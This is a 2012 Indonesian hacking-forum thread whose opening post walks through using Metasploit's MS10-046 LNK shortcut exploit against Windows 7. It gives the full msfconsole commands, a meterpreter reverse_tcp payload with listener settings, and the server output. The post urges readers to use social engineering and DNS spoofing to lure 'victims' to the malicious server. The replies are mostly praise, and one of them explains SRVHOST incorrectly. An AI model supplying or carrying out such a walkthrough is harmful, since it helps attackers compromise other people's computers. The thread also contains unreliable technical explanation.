Indonesian Back|Track Team
Exploit ms10_046_shortcut_icon_dllloader win7 attack - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Dracos-linux (https://www.indonesianbacktrack.or.id/forum/forum-156.html)
+--- Thread: Exploit ms10_046_shortcut_icon_dllloader win7 attack (/thread-3754.html)

Pages: 1 2 3


Exploit ms10_046_shortcut_icon_dllloader win7 attack - zee eichel - 10-07-2012

exploit ini masih work di windows7 .. walaupun memang dibutuhkan tehnik2 social engineering untuk membawa target membuka malicious url yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos bisa kesini

http://dracos-linux.org

Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok Smile )

Code:
root@dracos:~# msfconsole

Setelah terbuka seperti ini

[Image: win7exploit.png]

lanjutkan dengan menggunakan fasilitas search

Code:
msf > search LNK
Matching Modules
================
   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   post/windows/escalate/droplnk                                              normal     Windows Escalate SMB Icon LNK Dropper
   post/windows/gather/dumplinks                                              normal     Windows Gather Dump Recent Files lnk Info

Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut

Code:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp

Cek opsi2 yang kita perlu dalam menjalankan exploit ini Big Grin

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  80               yes       The daemon port to listen on (do not change)
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic

Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7
SRVHOST => 192.168.2.7

Kebetulan sih ip yang ane pake pada percobaan ini adalah

Code:
root@dracos:~# ifconfig wlan0 |grep inet
inet addr:192.168.2.7  Bcast:192.168.2.255  Mask:255.255.255.0
inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link

Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7
LHOST => 192.168.2.7

Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /bnVuSf
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending 301 for /bnVuSf ...
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND
sniff..

hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker

[Image: win7exploit1.png]

Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda .. Smile

akhir kata saya ucapkan selamat makan


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - m4k4ss4rh4ck3r - 10-07-2012

nice inpohh kakak zeee ...................;;;;;;;;;;;


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Junior Riau - 10-07-2012

mantap om zee, (y) bakal seru nih nampaknya


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - wine trochanter - 10-08-2012

wow keren om zee, kpn2 perkosa lepi ane lagi yah Tongue


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - xsan-lahci - 10-08-2012

wakakak akhir katanya selamat makan ada-ada aja om zee nih Big Grin ga ada matinye dah ah kalo maenan metasploit


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - shift-del - 10-08-2012

keren.. ikutan cobain juga ane,, udah gataltangan mw maen metasploit Big Grin


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Al - Ayyubi - 10-08-2012

baru aja kelar download Confused
langsung coba ah Smile
trimakasih om zee tutornya Smile



RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - kakus130908 - 10-08-2012

izin mempelajari tricknya om Smile


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - gnome_selpa - 10-09-2012

om zee, maap ni yak ?
srvhost itu apa
kan lhost itu ip kita,
sedangkan srvhost yang om zee bikin itu sama ama lhost...
bisa di jelasin dikit om, biar kagak bingung, thanks om zee ? Big Grin


RE: Exploit ms10_046_shortcut_icon_dllloader win7 attack - Junior Riau - 10-09-2012

(10-09-2012, 12:43 AM)gnome_selpa Wrote: om zee, maap ni yak ?
srvhost itu apa
kan lhost itu ip kita,
sedangkan srvhost yang om zee bikin itu sama ama lhost...
bisa di jelasin dikit om, biar kagak bingung, thanks om zee ? Big Grin

srvhost itu kalau nda salah server untuk listening dll nya waktu berjalan gitu loh, lihat aja di windos taksmanager, semakin banyak kita buka aplikasi, lihat service srvhost.exe semakin banyak